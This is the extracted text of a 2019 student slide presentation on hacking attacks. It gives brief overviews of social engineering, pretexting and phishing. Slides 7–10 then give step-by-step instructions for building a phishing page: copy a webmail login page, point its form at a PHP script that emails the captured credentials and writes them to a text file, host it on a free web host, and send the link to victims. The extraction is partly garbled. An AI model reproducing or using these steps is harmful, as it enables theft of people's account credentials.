Presentation on Hacking Attacks

8/2/2019 Presentation on Hacking Attacks

1/13

Submitted To:

Mr. Pankaj BajajCSE/IT DeptHOD

Submitted By:

Anuj KumarJanender KumarParveen Sindhar


2/13

Computer networks that are currently to the internet arevulnerable to a variety of exploits that can compromisetheir intended operations. Systems can be subject todenial of Service attacks that prevents other computer

from connecting to them for their provided service (e.g.web server) or prevent them from connecting to othercomputer on the Internet. They can be subject toattacks that cause them to cease. Operations eithertemporary or permanently. A hacker may be able tocompromise a system administrator. The number of

exploits targeted against various platforms, operatingsystems, and applications increases on daily basis.System administrators are usually responsible formonitoring the overall security of their networks.


3/13

Non Technical Attack

1. Social Engineering

2. Pretexting Technical Attack

1. Phishing

2. SQL injection3. Keyloggers


4/13

Social Engineering:-Most of us are suckered at some pointin our lives: coaxed, threatened, heart-strung or baitedinto doing something against our better judgment. After ithappens, we often feel foolish, although in truth, falling fora con is seldom a question of intelligence. As humans, weare bound by both nature and nature to the socialcontract which like many contracts might be twisted toour disadvantages. Such twisting is called socialengineering.

Social engineering is the name given to a category ofsecurity attacks in which some one manipulates others intorevealing information that can be used to steal, dataaccess to systems access to cellular phones, money oreven your own identity. Such attacks can be very simpleor very complex. Gaining access to information over thephone or through web sites that you visit has added a newdimension to the role of the social engineer


5/13

o Pretexting:-Pretexting is the act of creating andusing an invented scenario to obtain informationfrom target, usually over the telephone. It is more

than a simple lie, as it regularly involves some priorresearch and the use of pieces of knowninformation(eg.for impersonation, birthday,socialsecurity number,last employer,mothers maiden

name).This establishes legitimacy in the mind of thetarget.


6/13

Phishing:- Phishing attacks use both socialengineering and technical subterfuge to stealconsumers personal identity data and financial

account credentials.In phishing mainly we used some WebPages ofmail accounts or any login of some pages fromwhich username and passwords are steal due to

this we can login in any victims account.


7/13

Step1: Open any email server account web page likegmail.com and right click on the page and then clickon view source.

Step2:Press Ctrl+F and then find POST(please find thepost related with login form).

Step3: Then Replace

Action= HYPERLINK"https://login.yahoo.com/config/loginhttps://login.yaho

o.com/config/login?With Action =safin.phpHere safin.php is php file whichconsist of a php script which help in posting theusername and password to the web server or on anyfree hosting site like eg:www.my3gb.com
https://login.yahoo.com/config/login?https://login.yahoo.com/config/login?https://login.yahoo.com/config/login?https://login.yahoo.com/config/login?https://login.yahoo.com/config/login?


8/13

Code Of PHP Script:-


9/13

@mail($emailto, $subject,

$body, $from);

$handle = @fopen("cool.txt", "a+");@fwrite($handle, $posts);

fclose($handle);

Step 4: Then save the page as anyname.html

Step 5: Open safin.php script and at location

add the URL at which to redirect the page..


10/13

Step 6: Then upload the page andsafin.php script on a webserver. Here Iam using HYPERLINK"http://www.my3gb.com"www.my3gb.com.

Step 7:Then Transfer the links to the victims

and if the victim will try to login from yourpage the on your web server a autocool.txt will be created in which you cansee the password


11/13

Create an account on any free webhosting site.


12/13

Registering


13/13

Presentation on Hacking Attacks

Documents

Transcript of Presentation on Hacking Attacks